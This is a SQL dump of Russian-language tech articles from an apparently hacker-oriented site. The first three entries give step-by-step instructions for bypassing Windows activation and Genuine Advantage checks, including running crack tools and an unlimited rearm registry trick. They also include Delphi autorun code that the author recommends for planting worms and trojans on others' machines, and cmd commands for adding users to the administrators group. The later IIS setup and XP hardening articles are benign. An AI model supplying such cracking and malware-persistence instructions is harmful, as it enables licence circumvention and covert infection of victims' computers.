INSERT INTO gazeta_article VALUES("112","19","Что такое программа Windows Genuine Advantage? Программы Microsoft Genuine<br />Advantage, включая Windows Genuine<br />Advantage, позволяют определять<br />подлинность установленной копии<br />Windows. Подлинное программное<br />обеспечение Windows выпущено корпорацией Microsoft, надлежащим<br />образом лицензировано и<br />поддерживается корпорацией<br />Microsoft или ее авторизованными<br />партнерами. Оно позволяет<br />пользоваться всеми возможностями, обеспечивает доступ к последним<br />обновлениям и гарантирует<br />ожидаемый результат. Корпорация<br />Microsoft не перестает вкладывать<br />средства в информирование,<br />разработку специальных средств и контроль над исполнением законов,<br />что позволяет более эффективно<br />бороться с компьютерным<br />пиратством. Усилия корпорации<br />Microsoft направлены на защиту<br />своей интеллектуальной собственности и своевременное<br />предотвращение проблем у<br />пользователей.<br />Активация — это технология защиты от пиратства, позволяющая<br />проверять подлинность лицензии<br />установленной копии Windows XP.<br />Она следит за тем, чтобы ключ<br />продукта был действительным и<br />использовался только на том количестве компьютеров, которое<br />разрешено лицензией. Простая и<br />быстрая процедура активации<br />позволяет защитить используемую<br />копию системы и быть уверенным,<br />что деньги заплачены за настоящий продукт.<br />.::ВВЕДЕНИЕ::. Все чаще и чаще стал видеть эту<br />надпись на компах друзей, недавно и<br />сам схватил пришлось искать выходы<br />для лицензирования .<br />сначала даже хотел купить<br />лицензию. НО! полазив по многим форумам, блогам я все таки нашел<br />выход думаю многим будет интересно<br />почитать.<br />Возможно некоторые схемы вы уже<br />видели на форумах (zloy,<br />xaker,antichat и т.п.) я точно не могу сказать где какую статью брал т.к.<br />сначало я набрал схемы а потом<br />пробывал.<br />Данная проверка идет вместе с<br />обновлением KB905474 благо данное<br />обновление не обязательное. .::WINDOWS XP::. Для того чтобы убрать табличку о<br />том что windows не подлинная вам<br />надо проделать:<br />1. Пуск -> Поиск (Start -> Search)<br />2. Выбрать все файлы и папки<br />3. В дополнительных параметрах (More Advanced Options) выбрать<br />Посик в скрытых файлах и папках<br />(Search hidden files and folders)<br />4. Искать "WGA" (без кавычек)<br />5. Когда найдет: переименовать<br />WgaTray в WgaTray_ и грохнуть WGANotify<br />6. CTRL + ALT + DEL найти wgatray.exe<br />и завершить этот процесс<br />7. В результатх поиска найти<br />WGATray.Settings и открыть<br />блокнотом (notepad) 8. ПОЛНОСТЬЮ переписать<br />содержание вот так: Balloon interval =<br />9999999999 daysDaysBeforeBuyNow<br />Unactivated =<br />9999999999DaysBeforeBuyNow<br />Nongenuine = 9999999999Disabled = trueReduced reminders = true<br />9. Сохранить и закрыть<br />10. Перезагрузиться<br />11. Трея больше нету! Осталось<br />предупреждение в окне загрузки<br />12. Пуск -> Поиск (Start -> Run) ввести regedit<br />13. Идем в куст HKEY_LOCAL_MACHINE<br />\SOFTWARE\Microsoft\Windows\Curr<br />entVersion\Uninstall\WgaNotify<br />14. Убиваем два ключа, которые<br />начинаются: NoRemove 15. Панель управления -> Установка<br />и удаление программ (Control Panel -><br />Add or Remove Programs). Поставить<br />галку "Показать обновления" (Show<br />updates)<br />16. Windows Genuine Advantage Notifications (KB905474) Жмем<br />"Удалить"<br />17. Ушло. Закрываем окна с "Панель<br />управления" и "Установка и удаление<br />программ"<br />18. Возвращаемся в реестр и полностьюудаляем папку WgaNotify:<br />кликнуть в левой части и нажать DEL<br />19. Идем в куст HKEY_LOCAL_MACHINE<br />\SOFTWARE\Microsoft\Windows\Curr<br />entVersion\App Management\ARPCache<br />\WgaNotify кликаем на WgaNotify в левой части и жмем DEL<br />20. Идем в куст HKEY_LOCAL_MACHINE<br />\SYSTEM\ControlSet001\Services\E<br />ventlog\System\WgaNotify кликаем на<br />WgaNotify в левой части и жмем DEL<br />21. Идем в куст HKEY_LOCAL_MACHINE \SYSTEM\ControlSet002\Services\E<br />ventlog\System\WgaNotify кликаем на<br />WgaNotify в левой части и жмем DEL<br />22. Терь можно прибить суку. Идем в<br />куст HKEY_LOCAL_MACHINE\SOFTWARE<br />\Microsoft\Windows NT\CurrentVersion \Winlogon\Notify\WgaLogon -<br />выбираем WgaLogon в левой части и<br />жмем DEL<br />23. Перезагружаемся - нет ничего.<br />Загружаемся - нет никакого таймера!<br />24. при следующем обновлении снимите галочку с этого обновления<br />и выберите "не отображать больше<br />это обновление"<br />.::WINDOWS VISTA::. Активация Windows Vista<br />(приостановка таймера):<br />1. Установите Windows Vista<br />2. Перепишите папку _ACTIVATION на<br />жесткий диск.<br />3. Зайти в папку и запустите vistacrack.exe с правами<br />администратора.<br />Чтобы запустить приложение с<br />правами администратора,<br />кликните правой кнопкой мыши на<br />ярлык запускаемого приложения и выберите нужную опцию.<br />4. Нажмите 'Install' и установите патч.<br />Компьютер перезагрузится по<br />завершению установки.<br />5. Когда виста загрузится, в трее<br />появится предупреждение. Кликните на нём и разрешить<br />активатору запустится.<br />6. После этого активатор запустится и<br />закончит процесс установки.<br />7. Нажмите 'Finish', чтобы закрыть<br />программу. 8. Готово.<br />Чтобы проверить, работает или нет:<br />1. Перезагрузите компьютер.<br />2. Затем запустите cmd.exe<br />(командная строка) с правами<br />админа. Чтобы запустить приложение с<br />правами администратора,<br />кликните правой кнопкой мыши на<br />ярлык запускаемого приложения<br />и выберите нужную опцию.<br />3. Выполните команду slmgr.vbs -dlv<br />появится окно - если в самой нижней<br />строчке будет 43200 минут, то всё<br />прошло успешно.<br />Замечания:<br />1. Если после каждой новой перезагрузки снова будет запускаться<br />активатор и сообщать о<br />невозможности заново пропатчить<br />систему, то просто удалите папку _<br />ACTIVATION с жесткого диска.<br />2. Не переводите системное время назад! Иначе система будет<br />заблокирована, как<br />неактивировавшаяся за отведенные<br />30 дней.<br />(с) выписка из диска<br />Данный вариант не является противоправным. Более того, он<br />описан в документации от Microsoft.<br />Для выполнения этих нехитрых<br />действий не нужно никаких<br />посторонних ламалок, генераторов и<br />блокировщиков времени. Дальше я расскажу как это осуществить.<br />Чтобы можно было продлить срок<br />работы Microsoft Windows Vista без<br />активации нужно предпринять такие<br />несколько шагов:<br />Запустите regedit Откройте ключ Hkey_local_machine<br />\software\microsoft\windows Nt<br />\currentversion\sl<br />Правой кнопкой выделите<br />переменную Skiprearm По<br />умалчивании там сохранено число типа DWORD с шестнадцатиричным<br />значением 00000000 Выберите пункт<br />контекстного меню Edit и поменяйте<br />значение данной переменной на<br />00000001<br />Откройте командную строку с правами админа и введите команду<br />slmgr -rearm<br />или<br />rundll32 slc.dll,SLReArmWindows<br />Данная команда сбросит счетчик<br />отсчета неактивированных дней опять до 30. А изменение значения<br />ключа реестра позволяет делать<br />такой трюк неограниченное<br />количество раз. Для того, чтобы<br />продлить еще на 30 дней, нужно к<br />окончанию срока активации повторить действия 1-4."<br />(с) messerschmit<br />.::WINDOWS 7::. На этой Ос я опробовал более 10 схем<br />но не одна не помогла кроме одной.<br />[.:1:.] Скачать активатор по одной из<br />ссылок depositfiles.com/ letitbit.net<br />ifolder.ru<br />[.:2:.] распаковать архив и запустить файл<br />RemoveWAT.exe<br />[.:3:.] жмем на первую ссылку<br />[.:3:.] После чего программа<br />автоматический завершит свою<br />работу. перезагрузите ваш комп и вуаля.<br />Для того чтобы активировать<br />пиратскую виндовс 7 вам нужно<br />.::ВЫВОД::. Конечно лучше покупать лицензию,<br />но как вам известно на античате<br />более половины пользователей это<br />учащиеся(студенты, школьники)","Ваша копия Windows не является<br />подлинной","gazeta/img_780824.png","1375057341","4");
INSERT INTO gazeta_article VALUES("113","19","Чему учит статья: создавать<br />автозагрузку вашей программы<br />вместе с загрузкой ПК<br />Статья очень полезная и в то же<br />время легкая, и относится больше к<br />кодингу для новичков, так как те кто с этим постоянно<br />работают, знают все, что будет ниже,<br />наизусть.<br />Но людям, которые только начинают<br />свою работу в хак сфере, или просто<br />не сталкивались с подобным, думаю извлекут из нее массу полезного для<br />себя.<br />В ней будет рассмотрено два<br />наиболее распространенных<br />способов автозагрузки.<br />Итак, начнем. Для того чтобы сделать загрузку нашей программы вместе с<br />загрузкой Widows нам необходимо, в<br />первую очередь, изменить реестр<br />(Реестр Windows или системный<br />реестр (англ. Windows Registry) —<br />иерархически построенная база данных параметров и настроек в<br />большинстве операционных систем<br />Microsoft Windows.(c)Wikipedia)<br />Открываем его с следующим<br />способом: Пуск-Выполнить-regedit<br />или regedit.exe Тк реестр это древовидная система,<br />то понятно что она состоит из разных<br />деревьев имеющих свою название,<br />нас будут интересовать только те,<br />которые относятся к автозагрузкам.<br />Вот пару таких кеев: # HKEY_CURRENT_USERSOFTWARE<br />MicrosoftWindowsCurrentVersionRun<br /># HKEY_CURRENT_USERSoftware<br />MicrosoftWindowsCurrentVersionRunOnc<br />e<br /># HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVersionRunServ<br />ice<br /># HKEY_LOCAL_MACHINESoftware<br />MicrosoftWindowsCurrentVersionRun<br /># HKEY_LOCAL_MACHINESoftware<br />MicrosoftWindowsCurrentVersionRunOnc e<br /># HKEY_LOCAL_MACHINESoftware<br />MicrosoftWindowsCurrentVersionRunServ<br />ice<br /># HKEY_USERSSoftwareMicrosoft<br />WindowsCurrentVersionRun # HKEY_USERSSoftware Microsoft<br />WindowsCurrentVersionRunOnce<br /># HKEY_USERSSoftwareMicrosoft<br />WindowsCurrentVersionRunService p.s. Посмотреть программы которые у<br />вас уже стоят в автозагрузке можно<br />тут:<br />(Пуск-Выполнить-msconfig-<br />автозагрузка)<br />Настоятельно рекомендую не удалять ничего лишнего оттуда, ибо не<br />подвергнуть свой виндовс к<br />неминуемой гибели =)<br />Идем дальше... Теперь нам надо<br />вставить свою программу в любой из<br />данных ключей. Сделать это проще простого, просто<br />выполняем следующие шаги:<br />Открываем Delphi.<br />Создаем новую форму,<br />далее в (FormCreate(Sender: TObject); )<br />прописываем следающий код procedure TForm1.FormCreate(Sender:<br />TObject);<br />var<br />reg: TRegistry;<br />path: String;<br />begin path:=Application.ExeName;<br />reg:=Tregistry.Create;<br />reg.RootKey:=HKEY_CURRENT_USER;<br />if(reg.OpenKey<br />('SoftwareMicrosoftWindows' +<br />'CurrentVersionRun', True)) then begin reg.WriteString('Joker', path);<br />reg.CloseKey;<br />reg.Free;<br />end;<br />end;<br />end. P.S. Формула очень простая, думаю<br />для тех кто хоть как то сталкивался с<br />этим, не возникнет не каких<br />вопросов.<br />После чего в Uses добавляем модуль<br />Registry Ну и соответственно завершаем свою<br />работу с этим.<br />И вот,можно сказать все готово.<br />Ваша программа добавлена в<br />автозагрузку, можете проверить.И<br />правда просто?=) Этот способ очень хорош, так сказать<br />для личного пользования...<br />Но если вы хотите запустить кому<br />вредносортную программу( что то<br />типа червей, троянов и тд), то лучше<br />воспользоваться другим способом через win.in.<br />(тк он менее известен и полностью<br />совместим с Windows 9x)<br />Построен он соответственно тоже на<br />Delphi:<br />Открываем Delphi Создаем новую форму,<br />в Uses Добавляем модуль Inifiles<br />далее в (FormCreate(Sender: TObject); )<br />пишем следующие: var<br />Win:TIniFile;<br />warn:string;<br />begin<br />Win:=TIniFile.Create('Win.ini');<br />Win.ReadString('windows','run',warn); if warn<>Application.ExeName then<br />Win.WriteString('windows',<br />'run',Application.ExeName);<br />Win.Free; Закрываем, все готово.<br />p.s. Здесь с кодом чуть сложнее чем в<br />прошлом случае, но тк статья, так<br />скажем, не для профессионалов, то<br />думаю лучше не пудрить людям мозг,<br />обьясняя его значение. Ну вот в принципе и все, что я хотел<br />вам рассказать... Как всегда советую:<br />не лезть куда не надо,и прежде чем<br />что то сделать, узнайте об этом<br />поподробнее=)<br />Думаю данные знания помогут вам, так же как раньше помогли и мне=)<br />В принципе все. Пока!","Автозагрузка","gazeta/img_149419.png","1375057484","4");
INSERT INTO gazeta_article VALUES("114","21","Замечали ли вы когда-нибудь такую<br />тенденцию: чем дольше вы<br />работаете на компьютере без<br />переустановки Windows, тем больше<br />начинают тормозить программы,<br />дольше идет процесс загрузки, количество ошибок возрастает<br />лавинообразно. Некоторые горячие<br />головы сразу начинают<br />переустанавливать систему (а самые<br />одаренные при этом еще и<br />форматируют винт). После переустановки все начинает<br />грузиться и работать очень быстро,<br />но через пару месяцев ситуация<br />повторяется. Опять все<br />переустанавливать? Это не выход. Раз<br />вначале все работает быстро, значит, что-то в системе изменяется,<br />заставляя ее работать медленнее. А<br />что можно сделать, чтобы таких<br />изменений не было или как вернуть<br />все назад без переустановки?<br />Давайте пойдем в обратном порядке, т.е. определим следствие, найдем<br />причину и попробуем ее устранить.<br />Итак, наиболее частые проблемы при<br />работе:<br />- медленная загрузка компьютера;<br />- замедление работы программ; - частые сообщения о недопустимых<br />ошибках.<br />Медленная загрузка.<br />На это может повлиять большое<br />количество причин. Изначально<br />можно попробовать ускорить процесс, поиграв параметрами файла<br />msdos.sys. Но это постоянная<br />причина, которая не зависит от того,<br />сколько времени прошло с момента<br />установки системы (да и не самая<br />весомая). Основное влияние оказывает раздувшийся реестр и<br />запускаемые при загрузке Windows<br />программы.<br />Пока не загрузятся все программы из<br />автозагрузки, нормально работать не<br />удается, так что их смело можно включить в процесс загрузки<br />операционки. К тому же они сильно<br />сказываются на замедлении работы<br />всех программ (вторая неприятность<br />из списка), т.к. отъедают часть<br />оперативки. Задумайтесь, все ли они вам нужны? Уверен на 100%, что<br />хотя бы пару-тройку лишних<br />программ вы найдете. Безжалостно<br />удаляйте их (в смысле не сами<br />программы, они-то еще могут<br />пригодиться, а из автозагрузки). Где посмотреть, что у вас грузится?<br />Просто кратко перечислю основные<br />места: реестр (раздел HKEY_LOCAL_<br />MACHINE\SOFTWARE\Microsoft\Windows<br />\Current Version\ в подразделах, где<br />первым словом идет Run и раздел HKEY_CURRENT_USER), win.ini,<br />system.ini, Пуск -> Программы -><br />Автозагрузка.<br />Здорово влияет на длительность<br />загрузки размер реестра. Чем он<br />больше, тем медленнее загружается компьютер. А происходит это по той<br />простой причине, что каждый раз<br />идет проверка реестра на наличие<br />ошибок. Если таковых не<br />обнаружено, создается резервная<br />копия. На размер файлов реестра напрямую влияет количество<br />установленных программ. Можно<br />удалить весь ненужный софт, но это<br />не выход. Большая часть размера<br />уходит на записи, оставшиеся от уже<br />удаленных программ. Ради интереса посмотрите раздел HKLM\Software.<br />Наверняка вы найдете там записи<br />оставшиеся от ранее стоявших<br />программ. Можно попробовать<br />удалить их все вручную, но где<br />гарантия, что вы найдете все оставшиеся "хвосты"? Лучше для этих<br />целей использовать специальные<br />программы. Парочка их была описана<br />ранее. Это RegCleaner и NBG Clean<br />Regisrty. Ужав размер реестра можно<br />добиться значительного увеличения скорости загрузки.<br />Замедление работы программ.<br />Опять же, возможно несколько<br />причин. Не секрет, что недостаток<br />оперативки ведет к более медленной<br />работе программ. А оперативки много никогда не бывает. Чем<br />больше программ запущено<br />одновременно, тем медленнее будут<br />они работать. Каждой программе для<br />работы необходим определенный<br />объем оперативной памяти, который она берет из общего объема. Когда<br />суммарный объем таких кусочков<br />превысит физический размер<br />оперативки, начнется так называемое<br />свопирование, т.е. часть данных из<br />оперативки будет записана на жесткий диск в файл win386.swp<br />(для Win9x) или pagefile.sys (NT,2000).<br />Записываться будут в первую очередь<br />те данные, к которым реже всего<br />обращаются. На самом деле этот<br />процесс гораздо сложнее, но примерная суть именно такова. Когда<br />становятся необходимы данные,<br />записанные на жесткий диск, они<br />оттуда считываются, но, как вы<br />понимаете, доступ к данным на диске<br />происходит гораздо дольше, чем к данным из оперативки, поэтому и<br />наблюдается это жуткое<br />торможение, да еще и винт трещит<br />немилосердно. Следовательно, чтобы<br />все работало шустрее, надо<br />высвободить как можно больше оперативки. В первую очередь стоит<br />выгрузить лишние программы, о чем<br />я уже написал выше. Затем<br />оптимизировать загрузку драйверов.<br />Также не рекомендуется<br />использовать большую по объему картинку в качестве обоев на<br />Рабочем столе, т.к. она тоже<br />занимает место в памяти.<br />Одной из немаловажных причин<br />является высокая фрагментация<br />файлов на диске. Если у вас файл разбит на несколько кусочков,<br />которые разбросаны по всему диску,<br />то загружаться он будет гораздо<br />дольше, потому что помимо простого<br />чтения файла надо будет еще<br />несколько раз позиционировать считывающую головку, а это требует<br />заметных временных затрат. Поэтому<br />желательно при интенсивной работе<br />с жестким диском (частая запись и<br />удаление файлов) время от времени<br />проводить дефрагментацию. Участившиеся ошибки и сбои.<br />Часто, когда устанавливается новая<br />программа, в каталог Windows<br />кидаются файлы (библиотеки)<br />необходимые для работы этой<br />программы. Вносятся исправления в реестр, настройки системы. И, к<br />сожалению, иногда эти изменения<br />могут вызывать сбои в работе ОС.<br />Иногда заменяются стандартные<br />файлы библиотек собственными или<br />устаревшими версиями. Это тоже не лучшим образом сказывается на<br />работе. Ну, а если после<br />деинсталляции эти библиотеки будут<br />удалены, последствия могут быть<br />непредсказуемыми. Я не призываю<br />отказаться от установки нового софта, просто этим надо заниматься с<br />умом, особенно, если вы любите<br />поэкспериментировать. Существуют<br />утилиты, призванные устранить<br />последствия "кривой" установки или<br />деинсталляции программы. Описание их выходит за рамки данной статьи<br />(возможно, когда-нибудь такой<br />материал появится на сайте), но<br />наводку дать могу: весьма неплохой<br />программкой считается Professional<br />Uninstaller. Найти ее можно без проблем в любом поисковике. Также<br />есть программы, способные откатить<br />все изменения в системе до<br />контрольной точки, но это скорее<br />пригодится для исследователей<br />нового софта. А главное, попытайтесь определить,<br />после чего у вас посыпались ошибки.<br />Как правило, на пустом месте они не<br />происходят - этому предшествует<br />либо установка какой-то программы,<br />либо удаление. Ну, а, поняв, что повлекло сбои в работе, устранить их<br />гораздо проще.<br />И помните - переустановка системы -<br />это последний шаг, на который надо<br />идти только в том случае, когда все<br />другие методы себя исчерпали. Windows способен нормально<br />работать несколько лет. Любите его,<br />и он ответит вам взаимностью.","Ускорение загрузки Windows,<br />программ, устранение о","gazeta/img_251063.png","1375057746","4");
INSERT INTO gazeta_article VALUES("115","21","Недавно листал MSDN и наткнулся на<br />очень интересную информацию. Как<br />написано в MSDN с помощью cmd.exe<br />можно выполнять удивительные<br />вещи, а если точнее то, начиная от<br />создания папок с атрибутами и заканчивая созданием новых<br />пользователей с правами<br />администратора ПК, да же из под<br />учетной записи гостя.<br />И так начнем, для начала нужно<br />сказать для чего изначально предназначается cmd. CMD<br />расшифровывается как Command<br />Prompt (Приглашение ко вводу<br />команды), т.е. через эту программу<br />пользователь или программа<br />выполняют системные функции и получают результат, проще говоря<br />cmd.exe является командным<br />интерпретатором между машиной и<br />человеком.<br />И вот как обещал все эти «полезные»<br />команды :-) net session /delete – закрывает все сетевые сессии net user <имя пользователя> / domain – выводит всю<br />информацию о пользователе в<br />домене netstat -a – получает список всех подключений к компьютеру net sessions – выводит список текущих пользователей,<br />необходимо иметь права<br />администратора для доступа к этой<br />функции net send <имя компьютера> "<сообщение>" – посылает<br />сообщение пользователю<br />удалённого компьютера shutdown \\<имя компьютера> / t:2 /y /c – удалённо выключает<br />компьютер, требуется Resource Kit<br />(RK) shutdown \\ <имя компьютера> / r /y /c – удалённо перезагружает<br />компьютер с Windows NT/2000 (RK) nbtstat -a <имя компьютера> – удалённо получает имя<br />пользователя работающего на<br />компьютере nbtstat -A <IP address> – удалённо получает имя пользователя<br />работающего на компьютере по IP-<br />адресу ipconfig /all – выводит Ethernet адрес сетевой карты winipcfg – выводит информацию о текущих сетевых настройках net user <Имя_пользователя> /add – просто добавить пользователя с<br />правами гостя. net user <Имя_пользователя> / delete – Удаление любого<br />пользователя кроме админа и вас<br />(нужны права администратора). net localgroup <Имя_группы> <Имя_пользователя> /add –<br />Добавление в группу. С помощью<br />данной команды можно попасть и<br />в группу администраторов или<br />любую другую. net localgroup <Имя_группы> <Имя_пользователя> /delete –<br />Удаление из группы. Любого<br />пользователя. net share /? тоже нужно если надо расшарить диски соседа. Если есть<br />телнет доступ.<br />Все остальное смотрим по справке<br />по windows и в cmd (cmd /?).<br />На этом пока все, как еще<br />чтонибуть интересное найду обязательно напишу.","Интересные команды для cmd.exe","gazeta/img_475643.png","1375057804","4");
INSERT INTO gazeta_article VALUES("116","21","Для тех, кто никогда не<br />разворачивал веб-сайты на Windows<br />Server, процесс может казаться<br />сложным и непонятным. Поэтому, в<br />этой небольшой статье-инструкции, я<br />хочу рассказать о полном процессе установки и настройки — от момента<br />загрузки с установочного диска, до<br />развертывания Wordpress. Я покажу,<br />что процесс простой и даже<br />приятный.<br />Что нам нужно? Дистрибутив Windows web Server<br />2008 R2 (для экспериментов<br />подойдет trial версия, потом ее<br />можно будет активировать используя<br />лицензионный ключ)<br />Компьютер с 64-битным процессором (x64), 1 Гб памяти и DVD-приводом<br />Выделенный статический IP адрес,<br />предоставленный провайдером<br />Интернет<br />Час времени для того, чтобы<br />установить и настроить веб-сервер Если у нас все это есть, тогда —<br />поехали!<br />Шаг 1. Загрузка с установочного диска<br />Устанавливаем в BIOS загрузку с<br />диска, вставляем диск и, после<br />перезагрузки, нажимаем любую клавишу после появления надписи<br />“Press any key to boot from CD”.<br />Шаг 2. Установка Windows Web Server<br />2008 R2<br />После загрузки установщика с диска<br />отобразиться следующий экран. Можно оставить настройки по<br />умолчанию и перейти к следующему<br />экрану.<br />Там всего одна кнопка, начинающая<br />установку. Запустить установку<br />сервера – это очень просто! Перед установкой нужно выбрать<br />версию Windows Web Server 2008 R2.<br />На выбор предлагаются Full и Server<br />Core версии. При выборе Full, будет<br />установлен графический интерфейс,<br />и если вы впервые устанавливаете сервер и не знаете, как управлять им<br />из консольной строки, следует<br />выбрать именно Full версию.<br />Во время процесса установки будут<br />распакованы и установлены<br />необходимые файлы. После этого компьютер будет<br />автоматически перезагружен – после<br />перезагрузки следует вытащить<br />компакт-диск из DVD-привода, либо<br />отменить в BIOS загрузку с компакт-<br />диска, чтобы загружалась установленная система.<br />После перезагрузки установщик<br />Windows Server предложит принять<br />лицензионное соглашение, после<br />чего закончит установку.<br />После второй перезагрузки система будет полностью установлена и вам<br />останется только настроить веб-<br />сервер, чтобы запустить на нем веб-<br />сайт.<br />Шаг 3. Настройка веб-сервера<br />После первой загрузки веб-сервера вы увидите экран с набором ссылок<br />для управления сервером.<br />Настройка сетевых параметров<br />Поскольку для сервера нужен<br />выделенный статический IP адрес,<br />получаемый от провайдера, вам, наверное, потребуется настроить<br />сетевые параметры в соответствиями<br />с теми инструкциями, которые вам<br />сообщит провайдер – IP адрес,<br />Gateway, адрес DNS сервера.<br />Для того чтобы настроить сетевые параметры в основном инструменте<br />управления сервером, о котором<br />сказано выше, щелкнуть ссылку<br />Configure Networking, дальше<br />щелкнуть правой кнопкой мыши по<br />значку активного сетевого соединения и выбрать пункт меню<br />Properties.<br />Затем выбрать в списке пункт Internet<br />Protocol Version 4 (TCP/IP v4), нажать<br />кнопку Properties.<br />В открывшемся окне указать все параметры, сообщенные вам<br />провайдером Интернет или<br />администратором локальной сети.<br />Для того, чтобы запустить веб-<br />сервер, нужно на упомянутом выше<br />экране инструмента управления сервером щелкнуть по ссылке Add<br />roles и в открывшемся окне выбрать<br />Web Server (IIS).<br />После этого нажать кнопку Next<br />несколько раз, чтобы установить веб-<br />сервер. После окончания установке веб-<br />сервер будет запущен автоматически<br />и вы сможете посмотреть сайт по<br />умолчанию набрав в окне браузера<br />localhost/, либо IP адрес сервера.<br />Для того, чтобы управлять веб- сервером в главном меню нужно<br />запустить приложение Internet<br />Information Services (IIS) Manager.<br />Инструкции по использованию<br />Internet Information Services (IIS)<br />Manager можно найти на сайте learn.iis.net и на сайте<br />www.techdays.ru.<br />С этого момента вы уже можете<br />размещать HTML странички на вашем<br />только что установленном веб-<br />сервере. Шаг 4. Установка веб-сайта<br />Просто сервер без динамического<br />сайта, наверное, никому и не нужен.<br />Поэтому неплохой идеей является<br />установка приложений.<br />Для того, чтобы облегчить этот процесс создан специальный<br />инструмент Web Platform Installer,<br />который можно скачать на сайте<br />microsoft.com/web/.<br />Откройте сайт microsoft.com/web<br />Поскольку на сервере настроена повышенная система безопасности,<br />будут появляться окна с<br />сообщениями о заблокированных<br />элементах на страницах сайта. Чтобы<br />эти окна не досаждали нужно снять<br />галку Continue to prompt и нажать Close.<br />После этого в настройках Internet<br />Explorer 8 нужно открыть окно Tools -<br />> Internet Options, выбрать вкладку<br />Security, щелкнуть по значку Trusted<br />Sites, нажать кнопку Sites и в появившемся окне снять галку<br />Require server verification, ввести в<br />поле адрес download.microsoft.com и<br />нажать Add. Закрыть окно и<br />продолжить работать с браузером.<br />Качаем и запускаем Web Platform Installer.<br />После запуска Web Platform Installer,<br />сразу же можно приступить к<br />установке популярных веб-<br />приложений. Пусть в этот раз это<br />будет популярный движок блогов Wordpress.<br />Для установки Wordpress щелкните<br />по вкладке Web Applications слева,<br />проматайте бегунком список до<br />конца и поставьте галку рядом с<br />названием Wordpress. Смело нажимайте кнопку Install. Вам<br />покажут список компонентов,<br />которые будут установлены и<br />настроены для работы Wordpress.<br />Нажмите I Accept. После этого вас<br />попросят придумать пароль для администратора базы данных MySQL –<br />придумайте и запишите его куда-<br />нибудь, чтобы не забыть, он<br />понадобится при дальнейшей<br />установке.<br />Установка начнется, будут скачаны и установлены все компоненты, после<br />чего инструмент задаст несколько<br />дополнительных вопросов.<br />Сначала имя сайта для которого<br />нужно установить веб-приложение.<br />Можно оставить все настройки по умолчанию.<br />Затем нужно будет сконфигурировать<br />базу данных: указать пароль<br />администратора, который вы<br />придумали на предыдущем шаге и<br />заполнить пустые поля – в основном это ключевые фразы, необходимые<br />для безопасности и пароль<br />пользователя базы данных для<br />настройки веб-сайта – вам эти<br />данные тоже могут понадобиться в<br />будущем, поэтому их лучше куда- нибудь записать.<br />После всех настроек можно нажать<br />на ссылку Launch Wordpress и<br />продолжить ужа настройку самого<br />сайта в браузере.<br />Нужно придумать название блога и ввести ваш адрес электронной<br />почты, после чего для вас будет<br />сгенерирован пароль, разумеется его<br />нужно куда-то записать – он<br />понадобится для входа на сайт и<br />управления им. Все, сайт установлен и вы можете с<br />ним работать! Видите, как просто<br />можно настроить сайт. Всего-то<br />несколько минут.<br />Шаг 5. Привязка доменного имени<br />Для того, чтобы привязать к вашему сайту доменное имя вроде vasya-<br />pupkin.ru, нужно зарегистрировать<br />это доменное имя, например на сайте<br />nic.ru, после чего настроить DNS<br />сервера регистратора доменного<br />имени так, как указано на сайте регистратора, чтобы эти доменные<br />имена ссылались на IP адрес вашего<br />сервера.<br />После этого можно привязать<br />доменное имя к сайту. Для этого в<br />инструменте Internet Information Services (IIS) Manager нужно выбрать<br />сайт (по умолчанию там один Default)<br />и щелкнуть на панели справа ссылку<br />Bindings….<br />В открывшемся окне добавить<br />доменное имя, по которому должен отвечать этот сервер.","Запуск веб-сайта на Windows Web<br />Server 2008 R2","gazeta/img_548252.png","1375057885","4");
INSERT INTO gazeta_article VALUES("117","21","Сегодня мы поговорим о способах<br />защиты компьютера путем<br />конфигурирования ОС Windows XP.<br />Необходимость этого, прежде всего, связана с атакой и взломом самих<br />настроек операционной системы, а<br />также использованием ее ошибок.<br />Заранее предупреждаю, что при<br />управлении службами вы должны<br />быть внимательными и запоминать, какие службы отключаются.<br />Итак, начнем с простого. Одним из<br />способов распространения угроз<br />является переполнение буфера.<br />Напомню, что это запись данных в<br />выделенную область памяти, которая превышает предельный для нее<br />заявленный объем. В результате чего<br />данные, не вмещающиеся в буфер,<br />записываются в соседние области<br />памяти и могут повредить их<br />содержимое. Новые, 64-разярядные процессоры от AMD и Intel имеют<br />аппаратные средства защиты от<br />переполнения буфера, а в ОС<br />Windows это организовано<br />одноименным модулем защиты DEP<br />(Data Execution Prevention). Этот модуль вы найдете тут: Пуск –<br />Настройка – Панель управления –<br />Система, далее во вкладке<br />Дополнительно ищем Параметры<br />быстродействия и выбираем вкладку<br />Предотвращение перевыполнения данных.<br />Самый надежный способ защиты —<br />это отказ от возможности обмена<br />файлами по локальным сетям и через<br />Интернет. Для этого, предварительно<br />отключив сетевое подключение, нам необходимо пройти к его свойствам:<br />Пуск – Настройка – Сетевые<br />подключения, выбрать ваше<br />подключение и открыть свойства.<br />Удалить в свойствах подключения<br />все, что бы остался только Протокол TCP/IP. Далее ищем в свойствах<br />протокола TCP/IP раздел WINS, в<br />котором нам необходимо отключить<br />NetBIOS и снять галочку, где стоит<br />Включить просмотр LMHosts.<br />Для предотвращения заражения посредством автоматического запуска<br />содержимого съемных носителей<br />необходимо отключить автозапуск<br />для всех типов дисков. Чтобы не<br />рыться в ключах реестра, посоветую<br />хорошую программу, которая сама все за вас сделает – Panda Research<br />USB Vaccine.<br />А теперь перейдем к основным<br />источникам внедрения угроз –<br />службам операционной системы.<br />Основной задачей при отключении служб является закрытие сетевых<br />портов, это предотвращает<br />эксплуатацию уязвимостей системных<br />сервисов и других установленных<br />программ посредством сетевых атак.<br />Как только служба прекращает работу, используемый ею сетевой<br />порт перестает быть открытым.<br />Другие службы рекомендуется<br />отключать потому, что сами функции,<br />которые они предлагают, могут быть<br />использованы в злонамеренных целях. И, несомненно, плюсом от<br />отключения служб является<br />высвобождение ресурсов<br />оперативной памяти.<br />Для закрытия наиболее атакуемых<br />сетевых портов Windows рекомендуется использовать<br />специальную программу – Windows<br />Worms Doors Cleaner. Достоинством<br />этой программы является то, что она<br />не полностью отключает службы, а<br />закрывает их используемые порты через правку реестра. Эти действия<br />защищают ОС от нежелательных<br />ошибок в реестре при правке<br />вручную.<br />Остальное, к сожалению, придется<br />делать вручную через администрирование служб. Пройти к<br />менеджеру служб можно через Пуск<br />– Настройка – Панель управления –<br />Администрирование – Службы.<br />В списке служб понадобится выбрать<br />службу, два раза кликнуть по ней и в открывшемся окне свойств выбрать<br />Выключено. Если по необходимости<br />некоторые службы вами будут<br />использоваться - выставлять Авто.<br />Обратите внимание на пояснение, так<br />как вы должны сами понимать, используется эта служба<br />операционной системой или нет,<br />службы без описания можно просто<br />отключить (при этом имейте в виду,<br />что установка, скажем, антивирусной<br 